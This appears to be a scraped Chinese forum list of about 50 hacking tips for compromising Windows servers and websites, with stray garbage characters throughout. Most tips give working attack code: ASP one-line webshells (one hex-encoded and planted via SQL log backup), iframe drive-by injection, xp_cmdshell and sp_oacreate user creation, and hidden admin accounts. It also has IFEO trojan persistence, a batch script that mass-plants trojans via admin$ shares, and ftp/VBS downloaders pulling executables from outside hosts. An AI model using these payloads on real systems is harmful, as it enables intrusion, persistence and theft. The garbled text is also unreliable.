Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
: x- o* f1 c5 n8 B+ C) A$ ^cacls C:\windows\system32 /G hqw20:R* c2 G: w( M: v9 L$ R
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入0 t5 M$ G# ~) u# _$ P* g
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F5 T$ |# ? M- i1 v; t
1 M6 o9 T8 h, I; `+ }6 Y
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。$ R d. B, X+ S7 r b* e3 W
3 } l* U4 @* t0 G3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。9 p {- q' V) X! j4 h
/ m0 |6 g ]; k6 ?3 H4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号0 W9 w$ x, x8 A- u
* T& Z4 a/ K7 a8 r- `* a
5、利用INF文件来修改注册表/ @- _" ]: ~3 c/ K
[Version]8 U9 ?# C; D7 I! O
Signature="$CHICAGO$"
4 {0 I9 l5 k7 Z$ J u9 c) S8 K$ K[Defaultinstall]
s6 L C4 k1 O# s/ aaddREG=Ating
9 V8 J* j& W {; U2 B! S3 Q) I[Ating]
$ N6 [6 T* |. z0 e5 z; Q) |HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
( O8 z5 L4 l2 t3 d* \6 g7 ]以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
/ d2 L8 `+ j+ D0 B2 Y. [, K2 U7 Frundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
$ ^5 T3 S) U9 h5 O* d. W/ l. X其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU b, C) V- E. X1 y
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
/ ]1 N' c4 u+ v3 H3 r; FHKEY_CURRENT_CONFIG 简写为 HKCC
3 j: ?) L; b1 K" [0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值' _% O% `' Q& P( X; s7 \* Z& U% W
"1"这里代表是写入或删除注册表键值中的具体数据8 H3 Y8 U0 g# f4 w6 k. C n- X6 @. [, V
3 Q1 G' O, Q0 }* m
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
# M& u4 A7 s, c! K多了一步就是在防火墙里添加个端口,然后导出其键值
2 u" Q* R/ T+ I6 B[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
2 Z9 O* v' S& m# }+ X8 W) Q0 r7 B* |8 L/ N; _* l( k2 i
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽/ ~3 f. R; D' W3 V% u+ A- ~ h
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
9 L' ~3 c- h, Y2 d' q4 p3 v) r1 @$ U& a( @, I' J- y
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
) k2 A) i8 P) n/ L) U7 f
$ V( N6 y7 c2 A: Q: ~9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,' u5 a* O8 M# N! v1 A( M
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。 n! |- A L$ {+ c5 v
; s1 O) W6 V) |2 [% l- J( F
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”; E2 V+ G. l I3 p# r
1 ^! }0 d1 f) o6 M- i
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff," Q3 R/ X) m; Q% g8 G" i
用法:xsniff –pass –hide –log pass.txt# g; R n6 U8 O+ H0 C
$ m8 e# K/ q4 ^1 @2 T
12、google搜索的艺术
6 q2 |: T& B* s9 t# {搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
0 Z: P8 Z6 ?2 [: J! \或“字符串的语法错误”可以找到很多sql注入漏洞。( S b5 V/ ]+ F w
6 \/ @" E: F! I' p! j0 E9 y/ v
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。3 t4 [/ h5 V l8 g, B9 R" ]: n% H' O3 a3 W
+ w8 ^8 l8 M% H
14、cmd中输入 nc –vv –l –p 19876 E2 L5 d9 v! T) D) Y) w0 l
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
7 a4 A) N$ \3 n5 K6 n) W% t, _: g7 \7 T
15、制作T++木马,先写个ating.hta文件,内容为0 G* V7 d2 u- A+ D
<script language="VBScript">/ O9 ~& m' d R/ |6 H8 G: y3 L
set wshshell=createobject ("wscript.shell" )) I6 E% t5 v7 D. m6 _6 ?# p: h
a=wshshell.run("你马的名称",1)
2 Z1 g2 O, c4 t# Pwindow.close( B# H6 z+ K; D5 n) F$ A7 R7 G: u' Z* W
</script>
7 Z& i3 X0 C- _; |1 |& k再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。( N' a! t* m R5 ] K4 p( I: g
& S" l& _ y7 J. o$ Q: O1 X* f+ [7 E
16、搜索栏里输入
4 f# q. l2 Y* w* x关键字%'and 1=1 and '%'='
0 I( F( L3 i h! k% K5 y4 G关键字%'and 1=2 and '%'='/ ~( k& f. U# ~+ a
比较不同处 可以作为注入的特征字符
5 X { K6 [. Y# ]2 g. W9 G
* M8 p0 e d7 @5 o/ |: g2 \( |17、挂马代码<html>0 u+ G4 L- u* l* o9 Q5 G
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
- m# m% V8 p* e% T</html>
+ J2 D* { r" r5 b
5 D) g8 x. b ]) m8 [! E1 m! f18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,* {% P# ]9 o8 d0 o5 \; Z: x
net localgroup administrators还是可以看出Guest是管理员来。
" @/ M* z N- c9 [( Z$ w" v$ ?2 \& p+ O/ [/ j! A5 J
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
; t3 F: U4 a! e6 X1 A用法: 安装: instsrv.exe 服务名称 路径& G' y1 D) ` f& \, E( |2 n
卸载: instsrv.exe 服务名称 REMOVE
4 d2 Z' m6 r6 |* b# V4 E- d* r
% \, G" ?0 a; H2 [+ B4 o4 u+ ]( s( R5 o
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
- Q7 T6 q6 ]2 N8 Q, c c不能注入时要第一时间想到%5c暴库。9 m9 q9 H8 S' A
' z2 W' i& d* h) Q7 S" J$ _
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~3 \( B2 f; p8 X5 E! z" P4 o
: ^3 k' F* Y8 v6 n/ p" ?$ N
23、缺少xp_cmdshell时
6 M x0 F. `6 ]0 N: @ R9 j* ~尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
) ?" _) W5 Q- {) r. z假如恢复不成功,可以尝试直接加用户(针对开3389的)6 y2 N; i2 a% ?5 Q1 F) y: }
declare @o int
& u2 Z- d' x" G) kexec sp_oacreate 'wscript.shell',@o out
6 k( X: c8 t& U* [9 w5 c+ i) yexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
; I$ E# s' r. ]9 C# C% h: d# {
. I. d6 d% n, N' o4 i! `24.批量种植木马.bat! d; c# t# z8 M2 S2 U" j
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
. d/ j& N0 P6 T& q1 g0 T# M. ~for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
) C Q4 X. p( |) n扫描地址.txt里每个主机名一行 用\\开头
& M8 N6 z$ p2 t2 o$ ~* m% D6 F+ B' x1 k6 P) W- ], O% m3 E
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。; r1 G7 Z1 O" k v4 h1 b$ p' d
8 g( O# p: s0 z8 Z* ?/ j26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
+ i+ T9 r9 w* e# u5 R7 b# i将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.6 j( v9 `! c. \9 m
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马2 Z l( P" p* T; w; J7 j5 i2 u# Z
' Q/ G2 _% R, K0 O& {, T, w8 X27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP7 u1 @" O, `; o
然后用#clear logg和#clear line vty *删除日志, m! @" }' M# Y2 w
/ B1 }. v( M: ?* k28、电脑坏了省去重新安装系统的方法+ h. Y. N1 o; F4 U
纯dos下执行,* S# J5 V2 @, d7 E% u- j
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
' r. M; m7 Y" B6 T9 R% R2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config: s9 S- a* O8 Z) e: H. g0 c
8 J/ q. M( H; [; m8 S
29、解决TCP/IP筛选 在注册表里有三处,分别是:
, u4 t8 |0 R4 ~HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
; w% F4 n- V+ y* P$ z1 y' fHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ b) o3 u9 R: [% wHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; d) ~6 l$ r( A4 f+ K C, U
分别用 J( O2 w* O& V1 `8 S0 A3 R. f
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" P. M" f7 W/ f
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# P- W1 i2 j4 c" ]/ nregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip3 ]! [ r- k _ r' D2 ^
命令来导出注册表项
9 @4 F' B' d/ p- F0 h4 ^然后把三个文件里的EnableSecurityFilters"=dword:00000001,; l' R8 Y+ v) S
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
" T/ C5 i& f* U; N' ~regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
0 X& g: m( p; {9 h; t6 N
& p, T/ K/ C3 k: X% L30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
' w7 |0 i& L6 k8 D, `SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
/ Z0 ?8 X* q5 _, y1 |- T2 x2 |9 f& v5 I* b8 p+ \- s
31、全手工打造开3389工具# m% S: g' R7 r
打开记事本,编辑内容如下:
3 z+ |2 \* A4 F: becho [Components] > c:\sql/ j) N4 N1 E) e
echo TSEnable = on >> c:\sql
4 H, O( K5 o1 }% ^0 Ysysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
9 R4 W$ j3 O3 j编辑好后存为BAT文件,上传至肉鸡,执行
" t' O' n5 j( K/ @/ H6 ~1 ?$ D( J C# B1 L
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
) V- b3 K2 U a7 J& J- g$ x
5 x3 A* m1 k+ n* ~33、让服务器重启
; W! w6 V5 R' j8 q6 [! h V写个bat死循环:9 b, l8 P) p% Z2 }7 ]* s
@echo off
2 q+ H3 o* e& v I9 ?! R+ t:loop1
% W) y# B8 n' l$ V4 v Bcls
' H' n1 J$ I. ?% _start cmd.exe
! S! w- }5 Y6 h8 V% a+ ~! fgoto loop1
8 u. S" ~. X4 \$ p8 R8 B保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启! |4 r6 F& a1 I) @
2 f1 M# ^! f! ]8 ?+ g34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你, i; W: O+ L2 _
@echo off
+ |# f' s) h6 s! f3 K9 Odate /t >c:/3389.txt& P% n7 @! q- C# x3 X
time /t >>c:/3389.txt
. J4 V8 ]5 o0 I- A' Eattrib +s +h c:/3389.bat
, U! _. S( w; \- Q: E, ~attrib +s +h c:/3389.txt
d! ~ F6 E/ B7 E3 hnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt8 s$ Z l; i, C% w; W7 K$ I
并保存为3389.bat
{; g! r6 t4 i打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号0 X6 q( O' c/ A+ _ ?3 d0 ^# ?
! `4 X4 e: m q. U0 a9 G35、有时候提不了权限的话,试试这个命令,在命令行里输入:* L% p9 i4 @% z/ Z+ E& L i
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)0 s" Y$ X1 N j$ Q7 a
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。4 z: A( E8 @, _$ D
. g5 C8 D8 e8 m) R1 d# k1 W36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件5 b# e5 l5 `3 h, U# Z8 H: {
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
( d0 e1 Z' ^0 j2 m1 H$ fecho 你的FTP账号 >>c:\1.bat //输入账号
+ y. K3 d7 M$ ~3 @ g$ Jecho 你的FTP密码 >>c:\1.bat //输入密码% x7 `& S5 _+ ^8 `5 N+ R
echo bin >>c:\1.bat //登入) q) V% G! Y" a/ n! N
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么) E, }! ?9 E. N6 {; A
echo bye >>c:\1.bat //退出
* ]) @# O/ }+ J% E+ w. `然后执行ftp -s:c:\1.bat即可
8 Y: h3 m; s$ ?: h% l% C" V4 Z' |9 n6 A/ n
37、修改注册表开3389两法
; y. ?% S: |) j(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
* {6 q- P/ y2 G; i. qecho Windows Registry Editor Version 5.00 >>3389.reg
# }* K8 |6 n& A% e u! mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
" N4 f- L9 C- P: S: v. ~9 gecho "Enabled"="0" >>3389.reg
. h* W* R, y( zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
( T8 s8 O2 j0 t" q% f' Q' `4 g* PNT\CurrentVersion\Winlogon] >>3389.reg" K+ G* v0 f6 o8 b" B! K! J, w
echo "ShutdownWithoutLogon"="0" >>3389.reg
+ _4 w/ e9 @' Pecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]4 S) S9 Z+ S; S r R4 T# O
>>3389.reg
) f2 U$ K; I0 y2 n u6 ]6 Iecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg3 u& P9 U5 U/ e9 H3 s+ W3 h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
: X- Z: }8 }& e6 p>>3389.reg6 e. U8 n4 g! f0 z( e
echo "TSEnabled"=dword:00000001 >>3389.reg
& `# b' v/ m( K0 F+ qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg1 @' g" S5 p/ \* P
echo "Start"=dword:00000002 >>3389.reg* U$ f! x1 C0 @( ^/ i# A$ p1 A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
7 s1 S2 k9 L3 |>>3389.reg7 q0 i, q3 y! z1 A2 F+ q/ |) j) a
echo "Start"=dword:00000002 >>3389.reg) C0 d) w( S. s+ `: x0 v. K
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg# D( _5 i5 @% O* B3 U. s
echo "Hotkey"="1" >>3389.reg- A7 y: }4 c$ s' w' o
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! q5 \8 S s! \% M; AServer\Wds\rdpwd\Tds\tcp] >>3389.reg7 t4 `- j* _5 g" M, l
echo "PortNumber"=dword:00000D3D >>3389.reg! y- i1 b4 L6 C: n p0 E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! ?) w5 l2 e0 b, m/ |Server\WinStations\RDP-Tcp] >>3389.reg
0 j$ z. V' Z7 I5 Z7 Q2 I/ Xecho "PortNumber"=dword:00000D3D >>3389.reg
" Q- T, a9 N& c: T7 R- I( _" _8 b5 R把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
! U/ c) e9 i) I+ o$ L- F(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)& t: e, o! X x/ [3 W
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
. w( x" k" D+ J( F) n7 ^% W$ f9 U(2)winxp和win2003终端开启. [4 ? s( |9 L r4 R v
用以下ECHO代码写一个REG文件:. c2 g7 d4 V! K3 ~ G
echo Windows Registry Editor Version 5.00>>3389.reg& T* s, }; I1 U4 C
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( S& @7 n& `# h6 M# @& u
Server]>>3389.reg
' a0 |8 P7 k8 Becho "fDenyTSConnections"=dword:00000000>>3389.reg! i* E5 X8 H1 l; R5 |# J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 G3 \1 n' w7 e( E; @0 o( H
Server\Wds\rdpwd\Tds\tcp]>>3389.reg6 `# {$ f& n3 S6 G7 t
echo "PortNumber"=dword:00000d3d>>3389.reg
! {' o' k9 J6 T6 K" Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( D. i) l: j: c1 R
Server\WinStations\RDP-Tcp]>>3389.reg
* M8 Y7 R! z3 ^2 x3 Aecho "PortNumber"=dword:00000d3d>>3389.reg) H8 S2 Y: i* o: |" _! f
然后regedit /s 3389.reg del 3389.reg5 G5 Y0 t q* `% H8 C9 F9 @' v
XP下不论开终端还是改终端端口都不需重启* }- z" ?% K) D
/ ]4 w! ?9 f' c& ~6 m5 \38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃; V) F0 k; v3 i- I
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'' [# o% L# h3 m" L/ Q% x
9 C/ r! U2 Z0 b) C9 H
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!4 R5 U% k* F$ `- g' M
(1)数据库文件名应复杂并要有特殊字符1 T6 D: V: X/ M- J
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
- z5 L1 Z6 r$ \" f `. B; p: J U将conn.asp文档中的
1 @9 C v3 t* U0 C v/ l1 _DBPath = Server.MapPath("数据库.mdb")
r8 w) `1 |" u% econn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
+ u5 M g- H+ u6 N+ _# j" R2 o# s2 H% m+ g! D0 ~
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置 R0 H" Q8 C; ~+ R9 j& s
(3)不放在WEB目录里% _. L9 l* i3 D0 |2 r+ `
( z$ c! K' R8 h40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
; `! J- Q! f2 A5 J8 w5 u可以写两个bat文件
; s9 w- }' p# R@echo off
2 H# u" p# `2 R4 f3 s B, Z@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
' u' v/ [# R5 K@del c:\winnt\system32\query.exe
9 g$ L- ~# O- ] L3 _) K4 n@del %SYSTEMROOT%\system32\dllcache\query.exe5 I2 C- U d. I- G$ _( w; f
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
. A( @" S( L1 Q2 J. m4 j! ?" ?8 }& a: W
@echo off' ?! {. h2 h- g3 Y5 t, _$ L Q
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe F: t6 n2 Z- Y( U7 H5 P. c
@del c:\winnt\system32\tsadmin.exe: g7 R# |, g$ v+ B% B) e& \. j
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
5 I+ D0 s0 _9 _9 b, U) q+ D% v8 W* Z$ s; ]! k" V9 w* F; |+ V7 Y
41、映射对方盘符
( F% x4 b. N# A+ J- F4 |, Ytelnet到他的机器上,
+ h# T- p1 A4 W) U+ pnet share 查看有没有默认共享 如果没有,那么就接着运行
0 T x* m7 J4 e" n9 f- Snet share c$=c:4 U6 o; s8 w* s. m! Z" b
net share现在有c$5 D$ R6 o# g- V: r% b
在自己的机器上运行' G: V( y5 H9 a1 w9 ^7 I
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
7 N" p/ ^( }; P' G4 A l1 R1 W7 G4 O! @$ d% q6 U
42、一些很有用的老知识
; R) ^" i, H& ^7 p2 e2 O' ]type c:\boot.ini ( 查看系统版本 )
& W" Q4 h# f) w7 U0 @ X2 ]; hnet start (查看已经启动的服务)
& |( R: t' B2 aquery user ( 查看当前终端连接 )
( s6 N& G& z6 A0 }net user ( 查看当前用户 )
3 D9 m% P" G: P" g2 vnet user 用户 密码/add ( 建立账号 )
+ w, }* d: g8 L# tnet localgroup administrators 用户 /add (提升某用户为管理员)
2 u3 _* g" b5 @* e ]* q8 oipconfig -all ( 查看IP什么的 )
6 G+ o1 i5 a( M6 @* M vnetstat -an ( 查看当前网络状态 )3 V. h3 x- A7 I0 L' m" ?
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)# Y, U" S G( w* i8 i
克隆时Administrator对应1F45 o! a7 ^* T5 l1 _
guest对应1F5
/ t( Z# u4 I/ i- S( {0 h! ptsinternetuser对应3E8$ X. ^6 b7 v6 v
+ ]4 ~) G) M) x; T F( A43、如果对方没开3389,但是装了Remote Administrator Service* ~6 _2 O3 w1 D6 l1 X( f& C0 R7 n
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
9 ^7 D+ q% @' X% L( v解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
' v9 R0 ?1 w0 B4 I5 y, S先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"! S4 _1 P9 B+ ^- ?# _/ G
' }& y+ H1 E+ _: z" Z44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
( a& i5 ]4 |# \) l本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
2 P. E) n5 ?# E6 X+ r; i
9 E L$ S0 t; g/ I45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入); j& ?: S( L& f
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
+ X: g+ m3 w( s2 s0 c, x! H4 D& A# R^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =# p: x. Q# h5 i* x! A0 J
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =( K" q) z8 E3 X" N/ W
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
8 t% O+ {4 h" ?1 L9 g9 B(这是完整的一句话,其中没有换行符)! K0 T4 D- _3 w/ n( v" _
然后下载:
7 `/ _' {- N5 `6 p, Gcscript down.vbs http://www.hack520.org/hack.exe hack.exe
9 f+ r3 H. j& q( L# C2 r
/ y" N6 v$ x# U46、一句话木马成功依赖于两个条件:
: V# u( N( O/ R1 M" _! l+ e% N1、服务端没有禁止adodb.Stream或FSO组件
% Z% Q4 _* A; C/ v( Y; ]9 ^2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。: f/ j2 { k, A1 e, I: h
# f, f* L+ U& \) X
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
7 O8 e5 {# e, V# l# [5 s+ }" u;alter database utsz set RECOVERY FULL--
' b' Z6 F9 [2 p" X8 K* l;create table cmd (a image)--
T. t( |0 }: l0 _% X" N;backup log utsz to disk = 'D:\cmd' with init--' t% c- e- N6 h. E) ~9 W
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
0 Q! z) @" `( H' b5 ]% b& f;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--0 M; n2 o3 k7 R) K+ \6 X
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。5 l' K1 u* Z2 V
5 G$ d: J, E9 \! I; g48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
+ x9 o$ ?# j6 {9 f
3 S$ m3 c6 B2 z$ V; F; E! V用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
0 R, s" c% }4 ?# n: A, u/ Q所有会话用 'all'。
: H! p) S9 F P; ^1 L. ^* A-s sessionid 列出会话的信息。2 X8 W: j) _* e0 p$ B
-k sessionid 终止会话。
4 z1 s7 a& _- ~-m sessionid 发送消息到会话。
, U/ @* i4 {9 A0 Q* H. @) X( F+ L, D" v M4 ~. a: }/ e
config 配置 telnet 服务器参数。
1 o; K0 f9 ?$ u, T7 M& N# c
0 s1 S: ^2 T4 `1 a0 Q9 Ecommon_options 为:
7 G# q3 P4 l/ K- n2 T! w9 T-u user 指定要使用其凭据的用户 S* Z5 }' X& L! a
-p password 用户密码. g& l9 B6 j8 E
# Q" N- ?& M2 Z$ Y& [8 Y8 s
config_options 为:, F( H% p: B8 T% \) p
dom = domain 设定用户的默认域! x- V- o' ~+ K; T" W4 a) ~
ctrlakeymap = yes|no 设定 ALT 键的映射$ u2 k2 n( Q( j8 x8 M) K
timeout = hh:mm:ss 设定空闲会话超时值
" x6 j6 w, I R1 h6 ~* U" Etimeoutactive = yes|no 启用空闲会话。$ D" H6 X9 J2 q
maxfail = attempts 设定断开前失败的登录企图数。9 K- b* w+ U; c! J1 X+ Q
maxconn = connections 设定最大连接数。/ y1 M, ~* h9 Z& _9 c
port = number 设定 telnet 端口。
' p5 N' l6 m% L8 n2 e# G1 Ksec = [+/-]NTLM [+/-]passwd
# ]8 ?9 X$ d; e \' U2 q设定身份验证机构
; C, X, d% ~; b* `" sfname = file 指定审计文件名。 Z- G: z* k0 N
fsize = size 指定审计文件的最大尺寸(MB)。8 {3 ]$ p# T) E
mode = console|stream 指定操作模式。
3 J( `. W: ?/ ^( \8 p jauditlocation = eventlog|file|both
% B1 U2 N- f7 ?+ h! i, t1 ^指定记录地点
: F) u6 F2 s2 L# u& O( Waudit = [+/-]user [+/-]fail [+/-]admin$ R- I% s8 u; e! S; `5 n
5 u$ G. V, i! h5 l
49、例如:在IE上访问:8 F: L' Y b/ I6 e2 D2 a
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
. h# n! C$ i7 p+ B3 X( }! Qhack.txt里面的代码是:
4 M; @* ]2 [5 B, R<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">" {2 I5 l( ^' m3 O, C" e
把这个hack.txt发到你空间就可以了!; u2 C+ C) i7 t5 P2 t
这个可以利用来做网马哦!$ h. l3 P) |" K# e" T
% h! |& \5 ^, M! x' l
50、autorun的病毒可以通过手动限制!
0 b/ p2 F0 E- A- x- u. ~; j8 A1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
?' M) n' e# I* z* T6 x2,打开盘符用右键打开!切忌双击盘符~
* b5 [7 C, E: E' P: H, U' p3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
& ?, K6 [1 ^1 \
7 X3 n4 h( C; @1 M51、log备份时的一句话木马:
$ W( }' H; a" ^7 O6 G% G* A4 |* ?a).<%%25Execute(request("go"))%%25>( g, \; u( M0 L* ~
b).<%Execute(request("go"))%>& k6 @6 B0 R4 K
c).%><%execute request("go")%><%
& l4 N' f7 a5 s2 v4 y* A- h- V/ _d).<script language=VBScript runat=server>execute request("sb")</Script>
/ O' {& m2 \' D8 T' X* B6 [e).<%25Execute(request("l"))%25>. K2 ~+ ]4 p4 v( e- I/ `. D
f).<%if request("cmd")<>"" then execute request("pass")%>4 F* T4 Z9 ]. Q" f
+ c/ k. q! p& Y; C9 y( G+ ?% B7 ~52、at "12:17" /interactive cmd
8 ^* E6 `0 v9 M3 ]* ^执行后可以用AT命令查看新加的任务. i1 e- l) L$ i# b! Y6 x
